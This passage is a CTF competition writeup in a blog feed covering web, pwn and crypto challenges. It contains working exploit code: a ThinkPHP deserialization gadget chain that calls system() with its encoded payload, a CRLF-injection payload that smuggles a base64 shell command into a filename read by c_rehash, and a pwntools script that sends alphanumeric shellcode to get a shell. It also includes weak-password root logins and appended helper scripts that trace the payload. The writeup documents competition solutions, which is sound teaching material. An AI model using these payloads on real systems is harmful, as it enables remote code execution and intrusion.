plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span 
class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br></pre></td><td class="code"><pre><span class="line"><?php</span><br><span class="line"></span><br><span 
class="line">namespace think\model\concern;</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">trait Attribute</span><br><span class="line"></span><br><span class="line">{</span><br><span class="line"></span><br><span class="line">    private $data = ["key" => ["key1" => "cat /f*"]];</span><br><span class="line"></span><br><span class="line">    private $withAttr = ["key"=>["key1"=>"system"]];</span><br><span class="line"></span><br><span class="line">    protected $json = ["key"];</span><br><span class="line"></span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">trait ModelEvent{</span><br><span class="line"></span><br><span class="line">    protected $withEvent;</span><br><span class="line"></span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">namespace think;</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">abstract class Model{</span><br><span class="line"></span><br><span class="line">    use model\concern\Attribute;</span><br><span class="line"></span><br><span class="line">    use model\concern\ModelEvent;</span><br><span class="line"></span><br><span class="line">    private $exists;</span><br><span class="line"></span><br><span class="line">    private $force;</span><br><span class="line"></span><br><span class="line">    private $lazySave;</span><br><span class="line"></span><br><span class="line">    protected $suffix;</span><br><span class="line"></span><br><span class="line">    function __construct($a = '')</span><br><span class="line"></span><br><span class="line">    {</span><br><span class="line"></span><br><span class="line">        $this->exists = true;</span><br><span class="line"></span><br><span class="line">        $this->force = true;</span><br><span class="line"></span><br><span class="line">        $this->lazySave = 
true;</span><br><span class="line"></span><br><span class="line">        $this->withEvent = false;</span><br><span class="line"></span><br><span class="line">        $this->suffix = $a;</span><br><span class="line"></span><br><span class="line">    }</span><br><span class="line"></span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">namespace think\model;</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">use think\Model;</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">class Pivot extends Model{}</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">echo urlencode(serialize(new Pivot(new Pivot())));</span><br><span class="line"></span><br><span class="line">?></span><br></pre></td></tr></table></figure><p>Generated poc</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span 
class="line">a=O%3A17%3A%22think%5Cmodel%5CPivot%22%3A7%3A%7Bs%3A21%3A%22%00think%5CModel%00lazySave%22%3Bb%3A1%3Bs%3A17%3A%22%00think%5CModel%00data%22%3Ba%3A1%3A%7Bs%3A6%3A%22whoami%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A24%3A%22cat+..%2F..%2F..%2F..%2Fflag.txt%22%3B%7D%7Ds%3A19%3A%22%00think%5CModel%00exists%22%3Bb%3A1%3Bs%3A8%3A%22%00%2A%00table%22%3BO%3A17%3A%22think%5Cmodel%5CPivot%22%3A7%3A%7Bs%3A21%3A%22%00think%5CModel%00lazySave%22%3Bb%3A1%3Bs%3A17%3A%22%00think%5CModel%00data%22%3Ba%3A1%3A%7Bs%3A6%3A%22whoami%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A24%3A%22cat+..%2F..%2F..%2F..%2Fflag.txt%22%3B%7D%7Ds%3A19%3A%22%00think%5CModel%00exists%22%3Bb%3A1%3Bs%3A8%3A%22%00%2A%00table%22%3Bs%3A0%3A%22%22%3Bs%3A21%3A%22%00think%5CModel%00withAttr%22%3Ba%3A1%3A%7Bs%3A6%3A%22whoami%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22system%22%3B%7D%7Ds%3A7%3A%22%00%2A%00json%22%3Ba%3A2%3A%7Bi%3A0%3Bs%3A6%3A%22whoami%22%3Bi%3A1%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22whoami%22%3B%7D%7Ds%3A12%3A%22%00%2A%00jsonAssoc%22%3Bb%3A1%3B%7Ds%3A21%3A%22%00think%5CModel%00withAttr%22%3Ba%3A1%3A%7Bs%3A6%3A%22whoami%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22system%22%3B%7D%7Ds%3A7%3A%22%00%2A%00json%22%3Ba%3A2%3A%7Bi%3A0%3Bs%3A6%3A%22whoami%22%3Bi%3A1%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22whoami%22%3B%7D%7Ds%3A12%3A%22%00%2A%00jsonAssoc%22%3Bb%3A1%3B%7D</span><br></pre></td></tr></table></figure><p>Request the route <code>index.php/index/test</code></p><p><img src="https://img-blog.csdnimg.cn/img_convert/7fdb2ca6dff02b2f281ab3519e6e211e.gif" alt="图片"></p><h2 id="online-crt"><a href="#online-crt" class="headerlink" title="online_crt"></a>online_crt</h2><p>Download the code and audit it</p><p><img src="https://img-blog.csdnimg.cn/img_convert/bbdc99913b32a37f061b2a7a705b8f8c.gif" alt="图片"></p><p>app.py</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span 
class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">@app.route('/getcrt', methods=['GET', 'POST'])</span><br><span class="line"></span><br><span class="line">def upload():</span><br><span class="line"></span><br><span class="line">    Country = request.form.get("Country", "CN")</span><br><span class="line"></span><br><span class="line">    Province = request.form.get("Province", "a")</span><br><span class="line"></span><br><span class="line">    City = request.form.get("City", "a")</span><br><span class="line"></span><br><span class="line">    OrganizationalName = request.form.get("OrganizationalName", "a")</span><br><span class="line"></span><br><span class="line">    CommonName = request.form.get("CommonName", "a")</span><br><span class="line"></span><br><span class="line">    EmailAddress = request.form.get("EmailAddress", "a")</span><br><span class="line"></span><br><span class="line">    return get_crt(Country, Province, City, OrganizationalName, CommonName, EmailAddress)</span><br></pre></td></tr></table></figure><p>Generates a crt certificate</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span 
class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span 
class="line">80</span><br><span class="line">81</span><br></pre></td><td class="code"><pre><span class="line">@app.route('/createlink', methods=['GET'])</span><br><span class="line"></span><br><span class="line">def info():</span><br><span class="line"></span><br><span class="line">    json_data = {"info": os.popen("c_rehash static/crt/ && ls static/crt/").read()}</span><br><span class="line"></span><br><span class="line">    return json.dumps(json_data)</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">@app.route('/proxy', methods=['GET'])</span><br><span class="line"></span><br><span class="line">def proxy():</span><br><span class="line"></span><br><span class="line">    uri = request.form.get("uri", "/")</span><br><span class="line"></span><br><span class="line">    client = socket.socket()</span><br><span class="line"></span><br><span class="line">    client.connect(('localhost', 8887))</span><br><span class="line"></span><br><span class="line">    msg = f'''GET {uri} HTTP/1.1</span><br><span class="line"></span><br><span class="line">Host: test_api_host</span><br><span class="line"></span><br><span class="line">User-Agent: Guest</span><br><span class="line"></span><br><span class="line">Accept-Encoding: gzip, deflate</span><br><span class="line"></span><br><span class="line">Accept-Language: zh-CN,zh;q=0.9</span><br><span class="line"></span><br><span class="line">Connection: close</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">'''</span><br><span class="line"></span><br><span class="line">    client.send(msg.encode())</span><br><span class="line"></span><br><span class="line">    data = client.recv(2048)</span><br><span class="line"></span><br><span class="line">    client.close()</span><br><span class="line"></span><br><span class="line">    return data.decode()</span><br><span class="line"></span><br><span class="line">This can reach the Go 
service on internal port 8887</span><br><span class="line"></span><br><span class="line">func admin(c *gin.Context) {</span><br><span class="line"></span><br><span class="line">    staticPath := "/app/static/crt/"</span><br><span class="line"></span><br><span class="line">    oldname := c.DefaultQuery("oldname", "")</span><br><span class="line"></span><br><span class="line">    newname := c.DefaultQuery("newname", "")</span><br><span class="line"></span><br><span class="line">    if oldname == "" || newname == "" || strings.Contains(oldname, "..") || strings.Contains(newname, "..") {</span><br><span class="line"></span><br><span class="line">        c.String(500, "error")</span><br><span class="line"></span><br><span class="line">        return</span><br><span class="line"></span><br><span class="line">    }</span><br><span class="line"></span><br><span class="line">    if c.Request.URL.RawPath != "" && c.Request.Host == "admin" {</span><br><span class="line"></span><br><span class="line">        err := os.Rename(staticPath+oldname, staticPath+newname)</span><br><span class="line"></span><br><span class="line">        if err != nil {</span><br><span class="line"></span><br><span class="line">            return</span><br><span class="line"></span><br><span class="line">        }</span><br><span class="line"></span><br><span class="line">        c.String(200, newname)</span><br><span class="line"></span><br><span class="line">        return</span><br><span class="line"></span><br><span class="line">    }</span><br><span class="line"></span><br><span class="line">    c.String(200, "no")</span><br><span class="line"></span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>The admin function renames a file, which means the file name is under our control.</p><p>So the crux of the challenge, and the point we can act on, is the info function in app.py:</p><blockquote><p>ls lists the directory</p><p>c_rehash scans the .pem, .crt, .cer and .crl files in the given directory list, computes a hash value for each, and creates symbolic links to those files named after the computed hash. (If your platform does not support symbolic links, a copy is made instead.) This is useful for many programs, since it produces the directory layout OpenSSL requires in order to find certificates.</p></blockquote><p>Reaching the internal Go service requires a GET request that carries the parameters read from the POST form, so CRLF injection is used to send a complete HTTP request.</p><p>Final payload</p><figure class="highlight 
plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">uri=/admin/renam%25%36%35?oldname=6feee645-87d2-411f-bc5d-13501b3eae98.crt%26newname="||echo%25%32%30Y2F0IC9mbGFn|base64%25%32%30-d|sh||".crt%20HTTP/1.1%0aHost: admin%0aAa:%0a%0a</span><br></pre></td></tr></table></figure><p>First request getcrt to generate the crt file, then send the packet to rename the crt file.</p><p><img src="https://img-blog.csdnimg.cn/img_convert/5a337a2113289231676c0428672c87ce.gif" alt="图片"></p><p>Then createlink executes the command and the flag is shown.</p><p><img src="https://img-blog.csdnimg.cn/img_convert/c7856571cf29e3688c8c85932346c33d.gif" alt="图片"></p><h1 id="PWN"><a href="#PWN" class="headerlink" title="PWN"></a>PWN</h1><h2 id="login-nomal"><a href="#login-nomal" class="headerlink" title="login-nomal"></a>login-nomal</h2><p>Menu option 1 grants root privileges; option 2 mmaps a readable, writable and executable region, and there is a check that the input consists only of printable characters. Generate the shellcode with alpha3 and then get a shell.</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">from pwn import *</span><br><span class="line"></span><br><span class="line">p = process('./pwn')</span><br><span class="line"></span><br><span class="line">payload1 = "msg:ro0tt\nopt:1\n"</span><br><span class="line"></span><br><span class="line">p.sendline(payload1)</span><br><span class="line"></span><br><span class="line">sc = 
"Rh0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070tt"</span><br><span class="line"></span><br><span class="line">payload2 = "msg:"+sc+"\nopt:2\n"</span><br><span class="line"></span><br><span class="line">p.sendline(payload2)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure><h1 id="CRY"><a href="#CRY" class="headerlink" title="CRY"></a>CRY</h1><h2 id="基于挑战码的双向认证1"><a href="#基于挑战码的双向认证1" class="headerlink" title="基于挑战码的双向认证1"></a>基于挑战码的双向认证1</h2><p><img src="https://img-blog.csdnimg.cn/img_convert/24eb3fc89e176203bf9ec8ffded01e7b.gif" alt="图片"></p><p>非预期</p><p>用户名密码均为player</p><p>cd /root/cube-shell/instance/flag_server</p><p>直接 catflag 即可</p><p><img src="https://img-blog.csdnimg.cn/img_convert/061efd0fac7d10b650eb0a021d074c3b.gif" alt="图片"></p><h2 id="基于挑战码的双向认证2"><a href="#基于挑战码的双向认证2" class="headerlink" title="基于挑战码的双向认证2"></a>基于挑战码的双向认证2</h2><p>非预期</p><p>cat flag2.txt</p><h2 id="基于挑战码的双向认证2-1"><a href="#基于挑战码的双向认证2-1" class="headerlink" title="基于挑战码的双向认证2"></a>基于挑战码的双向认证2</h2><p>非预期</p><p>弱密码</p><p>su root、toor 密码</p><h2 id="签到电台"><a href="#签到电台" class="headerlink" title="签到电台"></a>签到电台</h2><p>根据公众号给出的提示,得到了“弼时安全到达了”所对应的7个电码:</p><p>1732 2514 1344 0356 0451 6671 0055</p><p>知道是要从密码表截取前28位,每位相加然后模除以10,加不进位,减不借位</p><p>脚本:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">key = '6561607990115808526135662113'</span><br><span class="line"></span><br><span class="line">nums = '1732251413440356045166710055'</span><br><span 
class="line"></span><br><span class="line">for i in range(28):</span><br><span class="line"></span><br><span class="line">    print((int(key[i]) + int(nums[i])) % 10, end="")  # digit-wise addition mod 10, no carry</span><br><span class="line"></span><br><span class="line"># prints 7293858303555154561291372168</span><br></pre></td></tr></table></figure><p>Pass the result in as a URL parameter to get the flag.</p><p><img src="https://img-blog.csdnimg.cn/img_convert/40c4aa11655ed4a165cd7b1586f4082c.png" alt="image"></p><h2 id="ISO9798"><a href="#ISO9798" class="headerlink" title="ISO9798"></a>ISO9798</h2><p>Request a challenge container and connect to it with nc from your own server.</p><p>The service first asks for a proof of work: brute-force the four-character string that, followed by the given suffix, hashes with SHA-256 to the given value.</p><p>Script:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">from hashlib import sha256</span><br><span class="line"></span><br><span class="line">import string</span><br><span class="line"></span><br><span class="line">s = string.ascii_letters + string.digits  # the original charset left out 'Z'</span><br><span class="line"></span><br><span class="line"># find four characters whose SHA-256, with the given suffix appended, equals the target</span><br><span class="line"></span><br><span class="line">for i in s:</span><br><span class="line"></span><br><span class="line">    for j in s:</span><br><span class="line"></span><br><span class="line">        for k in s:</span><br><span class="line"></span><br><span class="line">            for l in s:</span><br><span class="line"></span><br><span class="line">                candidate = i + j + k + l + 'xBSIsJVew5i1em0k'</span><br><span class="line"></span><br><span class="line">                b = sha256(candidate.encode('utf-8')).hexdigest()</span><br><span class="line"></span><br><span class="line">                if b == 'fd5cfd228da08b9b788e3c2290268eca55f98581c3c54e2c577dcb051de50071':</span><br><span class="line"></span><br><span class="line">                    print(candidate)</span><br></pre></td></tr></table></figure><p>Enter a number as the value of RB.</p><p>As the challenge hint says, follow the ISO 9798-2 standard: split the value the server returns to extract RA and RB, and concatenate them in the order the standard prescribes for the reply, RB followed by RA.</p><p><a href="https://www.doc88.com/p-1496121116297.html">https://www.doc88.com/p-1496121116297.html</a></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">s = '0dc7b82d345c2cdfee36dc1c7d5a397a78e6af74fa2bd810be55dd3cefb1afe96f5a0acdd3a17922baaf31ea767d99e2'  # value received from the server (hex)</span><br><span class="line"></span><br><span class="line">ra = s[0:32]  # RA: first 16 bytes</span><br><span class="line"></span><br><span class="line">rb = s[32:64]  # RB: next 16 bytes (the remaining 32 hex characters are not used)</span><br><span class="line"></span><br><span class="line">print(rb + ra)  # the reply token is RB || RA</span><br></pre></td></tr></table></figure><p>Enter the computed value to get the flag.</p><p><img src="https://img-blog.csdnimg.cn/img_convert/d717a424deb896a4ca97a7f1f83da1f8.png"></p>]]></content>
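The following Python script is an added example, not code from the writeup or from the challenge, that follows the web payload above hop by hop: the front end decodes the uri parameter once, the injected %0a bytes turn it into a complete request for the Go service, the Go-side conditions (RawPath set by the non-canonical escape, Host equal to admin, no "..") are satisfied, and the resulting file name is what c_rehash hands to a shell. Three things are assumptions: that app.py URL-decodes the parameter exactly once and places it in a request line unchanged, that the admin handler is routed at /admin/rename, and the shape of the per-file command c_rehash runs (modelled on the backtick invocation in the vulnerable Perl script).

```python
import base64
import urllib.parse

# The payload from the writeup, as sent to the front end (the uri form parameter).
PAYLOAD = ('uri=/admin/renam%25%36%35?oldname=6feee645-87d2-411f-bc5d-13501b3eae98.crt'
           '%26newname="||echo%25%32%30Y2F0IC9mbGFn|base64%25%32%30-d|sh||".crt'
           '%20HTTP/1.1%0aHost: admin%0aAa:%0a%0a')


def front_end_decode(body):
    """Assumed app.py behaviour: the form body is parsed once, which URL-decodes uri once."""
    return urllib.parse.parse_qs(body, keep_blank_values=True)['uri'][0]


def raw_request(uri, upstream_host='backend'):
    """Assumed: the front end puts the decoded uri straight into a request line for the
    internal service, so the LF bytes inside it break out of that line."""
    return 'GET ' + uri + ' HTTP/1.1\r\nHost: ' + upstream_host + '\r\n\r\n'


def parse_first_request(raw):
    """The first request a Go net/http server reads from this stream (it accepts bare LF
    line endings, which is why %0a alone is enough). Returns (method, target, headers)."""
    lines = raw.replace('\r\n', '\n').split('\n')
    method, target, version = lines[0].split(' ')
    headers = {}
    for line in lines[1:]:
        if line == '':
            break  # empty line ends the headers; whatever follows is a second, junk request
        name, _, value = line.partition(':')
        headers[name.strip()] = value.strip()
    return method, target, headers


def go_url_fields(target):
    """Mimic net/url: Path is the decoded path; RawPath is set only when the original
    escaping differs from the canonical one (renam%65 decodes to rename, so it is set)."""
    parts = urllib.parse.urlsplit(target)
    path = urllib.parse.unquote(parts.path)
    raw_path = parts.path if urllib.parse.quote(path, safe='/') != parts.path else ''
    query = urllib.parse.parse_qs(parts.query, keep_blank_values=True)
    return path, raw_path, query


def admin_handler(path, raw_path, query, host, static_path='/app/static/crt/'):
    """The checks of the Go admin handler shown in the writeup. Returns the two os.Rename
    arguments when the rename would happen, None otherwise. The route name is assumed."""
    if path != '/admin/rename':
        return None
    oldname = query.get('oldname', [''])[0]
    newname = query.get('newname', [''])[0]
    if oldname == '' or newname == '' or '..' in oldname or '..' in newname:
        return None  # c.String(500, "error"): only traversal is filtered, not shell syntax
    if raw_path != '' and host == 'admin':
        return static_path + oldname, static_path + newname
    return None  # c.String(200, "no")


def c_rehash_shell(filename):
    """Assumed shape of the per-file command the vulnerable c_rehash Perl script runs via
    the shell; the double quotes in the file name close the -in argument early."""
    return 'openssl x509 -subject_hash -fingerprint -noout -in "' + filename + '"'


def injected_command(newname):
    """Recover the command smuggled in the name: the quoted part is ||echo B64|base64 -d|sh||."""
    inner = newname.split('"')[1]
    b64 = inner.split('echo ')[1].split('|')[0].strip()
    return base64.b64decode(b64).decode()


def trace(payload=PAYLOAD):
    """Follow the payload hop by hop and return what each stage sees."""
    uri = front_end_decode(payload)
    method, target, headers = parse_first_request(raw_request(uri))
    path, raw_path, query = go_url_fields(target)
    host = headers.get('Host', '')
    rename = admin_handler(path, raw_path, query, host)
    return {
        'decoded_uri': uri,
        'path': path,
        'raw_path': raw_path,
        'host': host,
        'rename': rename,
        'shell': c_rehash_shell(rename[1]) if rename else None,
        'command': injected_command(query['newname'][0]) if rename else None,
    }


if __name__ == '__main__':
    for key, value in trace().items():
        print(key, '=', repr(value))
```

Running the script prints the decoded uri, the path /admin/rename with RawPath /admin/renam%65, Host admin, the rename arguments, the shell command c_rehash would run and the recovered command cat /flag; feeding admin_handler a canonical path (RawPath empty) or a name containing ".." shows the two conditions under which the handler refuses.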
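An added Python example, not part of the writeup, that generalizes the Check-in Radio Station script above into encode and decode functions for this digit-wise key: addition modulo 10 with no carry to encode, subtraction modulo 10 with no borrow to decode, for any two digit strings of equal length, plus the four-digit telegraph grouping. The key and codes are the values from the writeup.

```python
def add_no_carry(digits, key):
    """Digit-wise (d + k) mod 10: addition without carry."""
    if len(digits) != len(key):
        raise ValueError('digit string and key must have the same length')
    return ''.join(str((int(d) + int(k)) % 10) for d, k in zip(digits, key))


def sub_no_borrow(digits, key):
    """Digit-wise (d - k) mod 10: subtraction without borrow, the inverse of add_no_carry."""
    if len(digits) != len(key):
        raise ValueError('digit string and key must have the same length')
    return ''.join(str((int(d) - int(k)) % 10) for d, k in zip(digits, key))


def group4(digits):
    """Format a digit string as space-separated four-digit telegraph groups."""
    return ' '.join(digits[i:i + 4] for i in range(0, len(digits), 4))


# Values from the writeup: the first 28 digits of the key table and the seven codes.
KEY = '6561607990115808526135662113'
CODES = '1732 2514 1344 0356 0451 6671 0055'


def solve(codes=CODES, key=KEY):
    """Strip the grouping spaces, then add the key digit by digit."""
    digits = codes.replace(' ', '')
    return add_no_carry(digits, key[:len(digits)])


if __name__ == '__main__':
    out = solve()
    print(out)          # 7293858303555154561291372168
    print(group4(out))
    # decoding with the same key gives the original codes back
    print(sub_no_borrow(out, KEY) == CODES.replace(' ', ''))
```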
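An added Python example, not from the writeup, that covers both steps of the ISO9798 challenge in one place: a generic proof-of-work solver for the "four characters whose SHA-256 with the given suffix equals the target" prompt, searching the full alphanumeric alphabet in order, and the ISO 9798-2 reply construction that pulls RA and RB out of the hex string the server sends and returns RB followed by RA. The server's exact framing of that hex string (two 16-byte fields followed by an unused tail) is an assumption taken from the writeup's own split; the suffix, target and received value are the ones above.

```python
import hashlib
import itertools
import string

ALPHABET = string.ascii_letters + string.digits


def solve_pow(suffix, target_hex, alphabet=ALPHABET, length=4):
    """Return the first prefix of `length` characters (in alphabet order) such that
    sha256(prefix + suffix) equals target_hex, or None if there is none."""
    suffix_b = suffix.encode()
    for combo in itertools.product(alphabet, repeat=length):
        prefix = ''.join(combo)
        if hashlib.sha256(prefix.encode() + suffix_b).hexdigest() == target_hex:
            return prefix
    return None


def make_pow(prefix, suffix):
    """Build a target for a known prefix, so the solver can be exercised offline."""
    return hashlib.sha256((prefix + suffix).encode()).hexdigest()


def split_token(hex_value):
    """Split the server's hex value into RA, RB and the trailing field (16 bytes each
    as 32 hex characters; the tail is not needed for the reply)."""
    if len(hex_value) % 32 != 0 or len(hex_value) // 32 not in (2, 3):
        raise ValueError('expected two or three 16-byte fields as hex')
    return hex_value[0:32], hex_value[32:64], hex_value[64:]


def reply_token(hex_value):
    """ISO 9798-2 three-pass mutual authentication: the final token carries RB || RA."""
    ra, rb, _ = split_token(hex_value)
    return rb + ra


# Constants from the writeup: the proof-of-work suffix and target, and the received value.
SUFFIX = 'xBSIsJVew5i1em0k'
TARGET = 'fd5cfd228da08b9b788e3c2290268eca55f98581c3c54e2c577dcb051de50071'
RECEIVED = ('0dc7b82d345c2cdfee36dc1c7d5a397a78e6af74fa2bd810be55dd3cefb1afe9'
            '6f5a0acdd3a17922baaf31ea767d99e2')


if __name__ == '__main__':
    print(reply_token(RECEIVED))
    # full search over 62**4 candidates; this takes a while on a laptop
    print(solve_pow(SUFFIX, TARGET))
```

The solver is exhaustive and ordered, so a missing letter in the alphabet (the original script dropped Z) silently turns into "no solution"; building the alphabet from string.ascii_letters and string.digits avoids that.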
<summary type="html"><blockquote>
<p>Writeup from the Qilu Normal University Network Security Club (齐鲁师范学院网络安全社团)<br><img src="https://img-blog.csdnimg.cn/68def0711ab44a01be039f449062fe4b.png?x-oss-process=image/watermark</summary>
<category term="CTF" scheme="https://oceansec.github.io/categories/CTF/"/>
<category term="CISCN,wp" scheme="https://oceansec.github.io/tags/CISCN-wp/"/>
</entry>
</feed>